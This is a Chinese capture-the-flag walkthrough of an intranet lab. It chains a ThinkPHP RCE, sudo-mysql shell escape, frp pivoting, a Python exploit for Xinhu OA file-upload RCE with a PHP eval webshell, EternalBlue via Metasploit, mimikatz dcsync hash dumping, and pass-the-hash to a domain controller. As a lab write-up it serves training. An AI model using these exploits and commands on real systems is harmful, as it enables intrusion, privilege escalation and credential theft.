flag01
给了一个ip
fscan扫一下
./fscan -h 39.99.225.198 #靶机后面重置了一下,所以ip变了
80和22端口开放,识别到thinkphp5.0.23,存在RCE
用Thinkphpgui查找漏洞(一开始因为工具版本问题,一直不能getshell,心疼我的小砂砾),得到木马网址和密码
用蚁剑连接(上马)
进入shell,可以看到当前是www-data用户
查看sudo可执行的命令,发现mysql可以进行免密使用
sudo -l
查找flag
sudo mysql -e '\! find / -name flag*'
获取flag01
sudo mysql -e '\! cat /root/flag/flag01.txt'
flag01:flag{60b53231-
flag02
查看ip
ifconfig
发现172.22.1.0/24内网网段
用蚁剑上传fscan工具到var/www/html
fscan扫描172.22.1.0/24,结果默认保存在同目录下的result.txt中
chmod +x fscan
./fscan -h 172.22.1.0/24
提取出下面的内网信息
172.22.1.2 DC域控
172.22.1.21 MS17-010永恒之蓝
172.22.1.18 信呼OA系统
先来看信呼OA
利用frp和proxifier代理,可以访问到172.22.1.18(frp代理过程在这里)
①上传到靶机
②开启frp(服务器端和靶机端都开)
记得要先chmod +x frpc,不然会这样
③开启proxifier
④可以访问到172.22.1.18了,弱密码登录
admin
admin123
漏洞利用参考:[代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE_信呼2.2.8 漏洞-CSDN博客
exp.py如下
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
同目录下建立1.php木马
<?php eval($_POST["1"]);?>
执行python3 exp.py,得到文件上传路径
将1.php木马放到靶机中,再将蚁剑加入proxifier代理中
现在能用蚁剑连接信呼OA系统所属的windows了
flag02在C://Users/Administrator/flag/flag02.txt中
2ce3-4813-87d4-
flag03
最后打MS17-010,需要利用proxifier+msf攻击
首先配置一下proxychains(把公网服务器作为代理来进入内网)
vim /etc/proxychains.conf
msfconsole攻击
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
攻击成功后我们会得到一个正向连接的shell(meterpreter)
load kiwi调用mimikatz模块
load kiwi
抓取用户的hash
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值)
用crackmapexec去进行hash传递攻击,使得我们可以访问到DC上的文件
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
flag03:e8f88d0d43d6}
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
特别鸣谢:gkjzjh146的博客